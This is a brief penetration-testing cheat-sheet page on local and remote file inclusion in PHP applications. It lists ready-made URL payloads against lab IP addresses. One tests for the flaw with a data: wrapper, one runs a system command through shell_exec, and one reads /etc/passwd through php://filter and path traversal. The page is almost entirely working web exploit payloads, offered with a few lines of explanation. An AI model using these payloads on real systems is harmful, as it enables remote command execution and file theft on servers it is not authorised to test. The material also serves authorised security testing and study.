search

LFI/RFI Vulnerabilities

hashtag
Identifying Vulnerability

http://192.168.112.132/menu.php?file=data:text/plain,helloworld

IF this payload return helloworld then we can use php wrappers to execute php commands too

hashtag
Executing commands

http://192.168.112.132/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

hashtag
PHP filter

Another PHP wrapper, php://filter in this example the output is encoded using base64, so you’ll need to decode the output.

http://192.168.155.131/fileincl/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
PreviousBrute Forcing AuthenticationNextSQLi Vulnerabilities

Last updated